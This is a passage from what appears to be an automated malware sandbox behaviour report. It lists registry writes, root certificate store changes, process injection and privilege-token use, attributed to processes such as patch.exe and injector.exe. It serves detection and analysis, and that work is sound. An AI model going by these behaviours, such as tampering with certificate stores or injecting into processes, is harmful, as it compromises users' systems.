"18" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{5748F794-48DF-438D-85EB-98FFD70D18C9}\NumMethods msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{5CA9E537-5A1D-43F1-6F27-6A0DB298A9A8} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9128800F-762E-4120-871C-A2014234A607}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{C1BCC6D5-7966-481D-AB0B-D0ED73E28135}\NumMethods msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{41A033B8-CC87-4F6E-A0E9-47BB7F2D4BE5}\NumMethods\ = "28" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{B1A7A4F2-47B9-4A1E-82B2-07CCD5323C3F} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{EE206A6E-7FF8-4A84-BD34-0C651E118BB5}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E8F79A21-1207-4179-94CF-CA250036308F}\ = "IGuestFileOffsetChangedEvent" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{85632C68-B5BB-4316-A900-5EB28D3413DF}\NumMethods\ = "229" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{4F4ADCF6-3E87-11E9-8AF2-576E84223953}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BC68370C-8A02-45F3-A07D-A67AA72756AA}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{C1BCC6D5-7966-481D-AB0B-D0ED73E28135}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{F4D803B4-9B2D-4377-BFE6-9702E881516B}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{101AE042-1A29-4A19-92CF-02285773F3B5}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{13A11514-402E-022E-6180-C3944DE3F9C8}\TypeLib msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{85632C68-B5BB-4316-A900-5EB28D3413DF}\ProxyStubClsid32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{89A63ACE-0C65-11EA-AD23-0FF257C71A7F}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{A443DA5B-AA82-4720-BC84-BD097B2B13B8}\ = "IGuestAdditionsStatusChangedEvent" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{D23A9CA3-42DA-C94B-8AEC-21968E08355D}\TypeLib msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{024F00CE-6E0B-492A-A8D0-968472A94DC7} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AD47AD09-787B-44AB-B343-A082A3F2DFB1}\NumMethods\ = "76" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{181DFB55-394D-44D3-9EDB-AF2C4472C40A}\ = "ICloudNetworkEnvironmentInfo" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{027BC463-929C-40E8-BF16-FEA557CD8E7E}\NumMethods msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{59A235AC-2F1A-4D6C-81FC-E3FA843F49AE}\NumMethods\ = "38" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{A6DCF6E8-416B-4181-8C4A-45EC95177AEF}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B66349B5-3534-4239-B2DE-8E1535D94C0B}\ = "ISharedFolderChangedEvent" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D23A9CA3-42DA-C94B-8AEC-21968E08355D}\TypeLib\Version = "1.3" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{D947ADF5-4022-DC80-5535-6FB116815604}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00391758-00B1-4E9D-0000-11FA00F9D583}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{3BA329DC-659C-488B-835C-4ECA7AE71C6C}\NumMethods msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{4F4ADCF6-3E87-11E9-8AF2-576E84223953}\TypeLib\Version = "1.3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{A5BBDB7D-8CE7-469F-A4C2-6476F581FF72}\ = "IProgressTaskCompletedEvent" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D88F2A5A-47C7-4A3F-AAE1-1B516817DB41}\NumMethods\ = "11" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{22363CFC-07DA-41EC-AC4A-3DD99DB35594}\NumMethods msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{92ED7B1A-0D96-40ED-AE46-A564D484325E} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{C0447716-FF5A-4795-B57A-ECD5FFFA18A4}\TypeLib\Version = "1.3" msiexec.exe -
Processes:
patch.execsrss.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 patch.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
auK8VZaRDVFWuHg35HoY616s.exeafCO4RNNOdc8dre3EnIRbez8.exeauK8VZaRDVFWuHg35HoY616s.exeafCO4RNNOdc8dre3EnIRbez8.exerun.exeinjector.execmd.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exepowershell.exepowershell.exepowershell.exepowershell.EXEpid process 448 auK8VZaRDVFWuHg35HoY616s.exe 1684 afCO4RNNOdc8dre3EnIRbez8.exe 2580 auK8VZaRDVFWuHg35HoY616s.exe 3004 afCO4RNNOdc8dre3EnIRbez8.exe 3004 afCO4RNNOdc8dre3EnIRbez8.exe 3004 afCO4RNNOdc8dre3EnIRbez8.exe 3004 afCO4RNNOdc8dre3EnIRbez8.exe 3004 afCO4RNNOdc8dre3EnIRbez8.exe 2580 auK8VZaRDVFWuHg35HoY616s.exe 2580 auK8VZaRDVFWuHg35HoY616s.exe 2580 auK8VZaRDVFWuHg35HoY616s.exe 2580 auK8VZaRDVFWuHg35HoY616s.exe 1084 run.exe 1084 run.exe 2864 injector.exe 2864 injector.exe 2864 injector.exe 2864 injector.exe 2864 injector.exe 2864 injector.exe 2864 injector.exe 1400 cmd.exe 1400 cmd.exe 2864 injector.exe 2864 injector.exe 2864 injector.exe 2864 injector.exe 2864 injector.exe 2864 injector.exe 2864 injector.exe 2864 injector.exe 2864 injector.exe 2864 injector.exe 2864 injector.exe 1808 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 1808 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 1808 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 2864 injector.exe 2864 injector.exe 1808 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 1808 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 2864 injector.exe 2016 powershell.exe 2016 powershell.exe 2016 powershell.exe 2864 injector.exe 2864 injector.exe 1676 powershell.exe 2864 injector.exe 2864 injector.exe 2864 injector.exe 2864 injector.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 2864 injector.exe 2864 injector.exe 2864 injector.exe 2864 injector.exe 2864 injector.exe 2864 injector.exe 1676 powershell.EXE 2864 injector.exe 1676 powershell.EXE -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 480 480 -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
run.execmd.exepid process 1084 run.exe 1400 cmd.exe 1400 cmd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
installutil.exeauK8VZaRDVFWuHg35HoY616s.exeafCO4RNNOdc8dre3EnIRbez8.execsrss.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exepowershell.exepowershell.exeWMIC.exeMSBuild.exepowershell.exepowershell.EXEsc.exepowershell.exeWMIC.exepowershell.exepowershell.exeWMIC.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 3060 installutil.exe Token: SeDebugPrivilege 448 auK8VZaRDVFWuHg35HoY616s.exe Token: SeImpersonatePrivilege 448 auK8VZaRDVFWuHg35HoY616s.exe Token: SeDebugPrivilege 1684 afCO4RNNOdc8dre3EnIRbez8.exe Token: SeImpersonatePrivilege 1684 afCO4RNNOdc8dre3EnIRbez8.exe Token: SeSystemEnvironmentPrivilege 1824 csrss.exe Token: SeDebugPrivilege 1808 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Token: SeDebugPrivilege 2016 powershell.exe Token: SeDebugPrivilege 1676 powershell.exe Token: SeIncreaseQuotaPrivilege 1020 WMIC.exe Token: SeSecurityPrivilege 1020 WMIC.exe Token: SeTakeOwnershipPrivilege 1020 WMIC.exe Token: SeLoadDriverPrivilege 1020 WMIC.exe Token: SeSystemProfilePrivilege 1020 WMIC.exe Token: SeSystemtimePrivilege 1020 WMIC.exe Token: SeProfSingleProcessPrivilege 1020 WMIC.exe Token: SeIncBasePriorityPrivilege 1020 WMIC.exe Token: SeCreatePagefilePrivilege 1020 WMIC.exe Token: SeBackupPrivilege 1020 WMIC.exe Token: SeRestorePrivilege 1020 WMIC.exe Token: SeShutdownPrivilege 1020 WMIC.exe Token: SeDebugPrivilege 1020 WMIC.exe Token: SeSystemEnvironmentPrivilege 1020 WMIC.exe Token: SeRemoteShutdownPrivilege 1020 WMIC.exe Token: SeUndockPrivilege 1020 WMIC.exe Token: SeManageVolumePrivilege 1020 WMIC.exe Token: 33 1020 WMIC.exe Token: 34 1020 WMIC.exe Token: 35 1020 WMIC.exe Token: SeDebugPrivilege 1620 MSBuild.exe Token: SeDebugPrivilege 1312 powershell.exe Token: SeDebugPrivilege 1676 powershell.EXE Token: SeSecurityPrivilege 2696 sc.exe Token: SeSecurityPrivilege 2696 sc.exe Token: SeDebugPrivilege 2784 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1516 WMIC.exe Token: SeIncreaseQuotaPrivilege 1516 WMIC.exe Token: SeSecurityPrivilege 1516 WMIC.exe Token: SeTakeOwnershipPrivilege 1516 WMIC.exe Token: SeLoadDriverPrivilege 1516 WMIC.exe Token: SeSystemtimePrivilege 1516 WMIC.exe Token: SeBackupPrivilege 1516 WMIC.exe Token: SeRestorePrivilege 1516 WMIC.exe Token: SeShutdownPrivilege 1516 WMIC.exe Token: SeSystemEnvironmentPrivilege 1516 WMIC.exe Token: SeUndockPrivilege 1516 WMIC.exe Token: SeManageVolumePrivilege 1516 WMIC.exe Token: SeDebugPrivilege 1092 powershell.exe Token: SeDebugPrivilege 2108 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1868 WMIC.exe Token: SeIncreaseQuotaPrivilege 1868 WMIC.exe Token: SeSecurityPrivilege 1868 WMIC.exe Token: SeTakeOwnershipPrivilege 1868 WMIC.exe Token: SeLoadDriverPrivilege 1868 WMIC.exe Token: SeSystemtimePrivilege 1868 WMIC.exe Token: SeBackupPrivilege 1868 WMIC.exe Token: SeRestorePrivilege 1868 WMIC.exe Token: SeShutdownPrivilege 1868 WMIC.exe Token: SeSystemEnvironmentPrivilege 1868 WMIC.exe Token: SeUndockPrivilege 1868 WMIC.exe Token: SeManageVolumePrivilege 1868 WMIC.exe Token: SeDebugPrivilege 1488 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1348 WMIC.exe Token: SeIncreaseQuotaPrivilege 1348 WMIC.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
u1pw.3.exepid process 1516 u1pw.3.exe 1516 u1pw.3.exe 1516 u1pw.3.exe 1516 u1pw.3.exe 1516 u1pw.3.exe 1516 u1pw.3.exe 1516 u1pw.3.exe -
Suspicious use of SendNotifyMessage 7 IoCs
Processes:
u1pw.3.exepid process 1516 u1pw.3.exe 1516 u1pw.3.exe 1516 u1pw.3.exe 1516 u1pw.3.exe 1516 u1pw.3.exe 1516 u1pw.3.exe 1516 u1pw.3.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
run.exeMSBuild.exepid process 1084 run.exe 1084 run.exe 1620 MSBuild.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
